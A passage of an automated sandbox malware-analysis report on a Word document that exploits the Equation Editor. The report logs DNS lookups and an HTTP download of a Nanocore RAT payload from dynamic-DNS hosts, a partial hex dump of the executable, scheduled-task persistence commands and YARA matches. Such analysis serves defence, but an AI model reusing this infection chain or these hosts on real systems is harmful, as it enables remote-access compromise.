Jan 27, 2021 19:12:26.768579960 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768613100 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768754959 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.768789053 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768807888 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768825054 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768836975 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768852949 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.768867970 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.768889904 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.769238949 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.845402002 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845433950 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845453978 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845472097 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845488071 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845501900 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.845519066 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.845531940 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845586061 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.845696926 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845719099 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845736027 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845752001 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845768929 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845782995 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.845793962 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845809937 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845817089 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.845832109 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845851898 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845860958 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.845880032 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845901966 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845906973 CET	49165	80	192.168.2.22	84.38.135.158
Jan 27, 2021 19:12:26.845925093 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845940113 CET	80	49165	84.38.135.158	192.168.2.22
Jan 27, 2021 19:12:26.845947981 CET	49165	80	192.168.2.22	84.38.135.158

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 19:12:26.185738087 CET	52197	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:12:26.243801117 CET	53	52197	8.8.8.8	192.168.2.22
Jan 27, 2021 19:12:26.253725052 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:12:26.316358089 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 19:12:26.316696882 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:12:26.373219967 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 19:12:36.786773920 CET	52838	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:12:36.870922089 CET	53	52838	8.8.8.8	192.168.2.22
Jan 27, 2021 19:12:36.871509075 CET	52838	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:12:36.934432983 CET	53	52838	8.8.8.8	192.168.2.22
Jan 27, 2021 19:12:54.519083023 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:12:54.575504065 CET	53	61200	8.8.8.8	192.168.2.22
Jan 27, 2021 19:12:54.575916052 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:12:54.623795986 CET	53	61200	8.8.8.8	192.168.2.22
Jan 27, 2021 19:13:14.112723112 CET	49548	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:13:14.169197083 CET	53	49548	8.8.8.8	192.168.2.22
Jan 27, 2021 19:13:31.679816961 CET	55627	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:13:31.736298084 CET	53	55627	8.8.8.8	192.168.2.22
Jan 27, 2021 19:13:31.737483978 CET	55627	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:13:31.793814898 CET	53	55627	8.8.8.8	192.168.2.22
Jan 27, 2021 19:13:31.794747114 CET	55627	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:13:31.852606058 CET	53	55627	8.8.8.8	192.168.2.22
Jan 27, 2021 19:13:49.371983051 CET	56009	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:13:49.430886030 CET	53	56009	8.8.8.8	192.168.2.22
Jan 27, 2021 19:13:49.431859016 CET	56009	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:13:49.490283012 CET	53	56009	8.8.8.8	192.168.2.22
Jan 27, 2021 19:14:06.224828959 CET	61865	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:14:06.283364058 CET	53	61865	8.8.8.8	192.168.2.22
Jan 27, 2021 19:14:23.264394999 CET	55171	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:14:23.315639973 CET	53	55171	8.8.8.8	192.168.2.22
Jan 27, 2021 19:14:23.316215038 CET	55171	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:14:23.377532959 CET	53	55171	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 19:12:26.185738087 CET	192.168.2.22	8.8.8.8	0xc62b	Standard query (0)	manojvashanava234.sytes.net	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:26.253725052 CET	192.168.2.22	8.8.8.8	0x2d4b	Standard query (0)	manojvashanava234.sytes.net	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:26.316696882 CET	192.168.2.22	8.8.8.8	0x2d4b	Standard query (0)	manojvashanava234.sytes.net	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:36.786773920 CET	192.168.2.22	8.8.8.8	0x8e4a	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:36.871509075 CET	192.168.2.22	8.8.8.8	0x8e4a	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:54.519083023 CET	192.168.2.22	8.8.8.8	0xd5c3	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:54.575916052 CET	192.168.2.22	8.8.8.8	0xd5c3	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:14.112723112 CET	192.168.2.22	8.8.8.8	0x62a5	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:31.679816961 CET	192.168.2.22	8.8.8.8	0x80ac	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:31.737483978 CET	192.168.2.22	8.8.8.8	0x80ac	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:31.794747114 CET	192.168.2.22	8.8.8.8	0x80ac	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:49.371983051 CET	192.168.2.22	8.8.8.8	0x51f2	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:49.431859016 CET	192.168.2.22	8.8.8.8	0x51f2	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:14:06.224828959 CET	192.168.2.22	8.8.8.8	0x4aa4	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:14:23.264394999 CET	192.168.2.22	8.8.8.8	0x70c0	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)
Jan 27, 2021 19:14:23.316215038 CET	192.168.2.22	8.8.8.8	0x70c0	Standard query (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 27, 2021 19:12:26.243801117 CET	8.8.8.8	192.168.2.22	0xc62b	No error (0)	manojvashanava234.sytes.net	84.38.135.158	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:26.316358089 CET	8.8.8.8	192.168.2.22	0x2d4b	No error (0)	manojvashanava234.sytes.net	84.38.135.158	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:26.373219967 CET	8.8.8.8	192.168.2.22	0x2d4b	No error (0)	manojvashanava234.sytes.net	84.38.135.158	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:36.870922089 CET	8.8.8.8	192.168.2.22	0x8e4a	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:36.934432983 CET	8.8.8.8	192.168.2.22	0x8e4a	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:54.575504065 CET	8.8.8.8	192.168.2.22	0xd5c3	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:12:54.623795986 CET	8.8.8.8	192.168.2.22	0xd5c3	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:14.169197083 CET	8.8.8.8	192.168.2.22	0x62a5	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:31.736298084 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:31.793814898 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:31.852606058 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:49.430886030 CET	8.8.8.8	192.168.2.22	0x51f2	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:13:49.490283012 CET	8.8.8.8	192.168.2.22	0x51f2	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:14:06.283364058 CET	8.8.8.8	192.168.2.22	0x4aa4	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:14:23.315639973 CET	8.8.8.8	192.168.2.22	0x70c0	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)
Jan 27, 2021 19:14:23.377532959 CET	8.8.8.8	192.168.2.22	0x70c0	No error (0)	dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu	46.243.219.32	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

manojvashanava234.sytes.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	84.38.135.158	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:12:26.451312065 CET	0	OUT	GET /WAH.exe HTTP/1.1 Connection: Keep-Alive Host: manojvashanava234.sytes.net
Jan 27, 2021 19:12:26.534096956 CET	2	IN	HTTP/1.1 200 OK Date: Wed, 27 Jan 2021 18:12:25 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1 Last-Modified: Wed, 27 Jan 2021 18:12:25 GMT ETag: W/"1e1e00-5b9e73c7fac88" Accept-Ranges: bytes Content-Length: 1973760 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 e7 39 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 1e 00 00 02 00 00 00 00 00 00 5e 38 1e 00 00 20 00 00 00 40 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 1e 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 1e 00 00 20 00 00 00 1a 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1e 00 00 02 00 00 00 1c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 38 1e 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 52 00 00 60 e5 1d 00 03 00 00 00 94 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 95 01 00 06 39 18 00 00 00 fe 09 00 00 72 60 02 1d 70 fe 09 01 00 28 43 00 00 0a 28 44 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 45 00 00 0a 2a fe 09 00 00 2a 2a fe 09 00 00 28 5f 00 00 0a 2a 00 13 30 01 00 5f 08 00 00 00 00 00 00 28 93 01 00 06 28 92 01 00 06 28 91 01 00 06 28 90 01 00 06 28 8f 01 00 06 28 8e 01 00 06 28 8d 01 00 06 28 8c 01 00 06 28 8b 01 00 06 28 8a 01 00 06 28 89 01 00 06 fe 06 01 00 00 0a 80 87 01 00 04 28 88 01 00 06 28 87 01 00 06 28 86 01 00 06 fe 06 02 00 00 0a 80 86 01 00 04 28 85 01 00 06 28 84 01 00 06 28 83 01 00 06 fe 06 03 00 00 0a 80 85 01 00 04 28 82 01 00 06 28 81 01 00 06 28 80 01 00 06 28 7f 01 00 06 28 7e 01 00 06 28 7d 01 00 06 28 7c 01 00 06 28 7b 01 00 06 28 7a 01 00 06 28 79 01 00 06 28 78 01 00 06 28 77 01 00 06 28 76 01 00 06 28 75 01 00 06 28 74 01 00 06 28 73 01 00 06 28 72 01 00 06 28 71 01 00 06 28 70 01 00 06 28 6f 01 00 06 28 6e 01 00 06 fe 06 04 00 00 0a 80 84 01 00 04 28 6d 01 00 06 28 6c 01 00 06 28 6b 01 00 06 fe 06 05 00 00 0a 80 83 01 00 04 28 6a 01 00 06 28 69 01 00 06 28 68 01 00 06 fe 06 06 00 00 0a 80 82 01 00 04 28 67 01 00 06 28 66 01 00 06 28 65 01 00 06 fe 06 07 00 00 0a 80 81 01 00 04 28 64 01 00 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL9`^8 @@ `@8K@ H.textd `.reloc@@B@8HR`* 90(9r`p(C(D(E**(_0_((((((((((((((((((((((~(}(\|({(z(y(x(w(v(u(t(s(r(q(p(o(n(m(l(k(j(i(h(g(f(e(d

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2284 Parent PID: 584

General

Start time:	19:12:38
Start date:	27/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fdc0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2424 Parent PID: 584

General

Start time:	19:12:39
Start date:	27/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: JNM.exe PID: 1692 Parent PID: 2424

General

Start time:	19:12:42
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\JNM.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\JNM.exe
Imagebase:	0xce0000
File size:	1973760 bytes
MD5 hash:	10D30AD1922421E73E133AD020DF424F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 35%, ReversingLabs
Reputation:	low

Analysis Process: cmd.exe PID: 1780 Parent PID: 1692

General

Start time:	19:12:44
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x4abd0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 2336 Parent PID: 1780

General

Start time:	19:12:45
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0xa20000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: JNM.exe PID: 2304 Parent PID: 1692

General

Start time:	19:12:46
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\JNM.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\JNM.exe
Imagebase:	0xce0000
File size:	1973760 bytes
MD5 hash:	10D30AD1922421E73E133AD020DF424F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: schtasks.exe PID: 2808 Parent PID: 2304

General

Start time:	19:12:48
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
Imagebase:	0xca0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: schtasks.exe PID: 2476 Parent PID: 2304

General

Start time:	19:12:49
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
Imagebase:	0xb40000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskeng.exe PID: 2464 Parent PID: 860

General

Start time:	19:12:49
Start date:	27/01/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff1a0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: JNM.exe PID: 2360 Parent PID: 2464

General

Start time:	19:12:50
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\JNM.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\JNM.exe 0
Imagebase:	0xce0000
File size:	1973760 bytes
MD5 hash:	10D30AD1922421E73E133AD020DF424F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: smtpsvc.exe PID: 3012 Parent PID: 2464

General

Start time:	19:12:51
Start date:	27/01/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Imagebase:	0x150000
File size:	1973760 bytes
MD5 hash:	10D30AD1922421E73E133AD020DF424F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 35%, ReversingLabs
Reputation:	low

Analysis Process: cmd.exe PID: 1360 Parent PID: 2360

General

Start time:	19:12:56
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x4a8f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 1480 Parent PID: 1360

General

Start time:	19:12:57
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0xc10000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 1836 Parent PID: 3012

General

Start time:	19:12:58
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x4a8f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 1336 Parent PID: 1836

General

Start time:	19:12:59
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0x7f0000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: JNM.exe PID: 2220 Parent PID: 2360

General

Start time:	19:12:59
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\JNM.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\JNM.exe
Imagebase:	0xce0000
File size:	1973760 bytes
MD5 hash:	10D30AD1922421E73E133AD020DF424F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
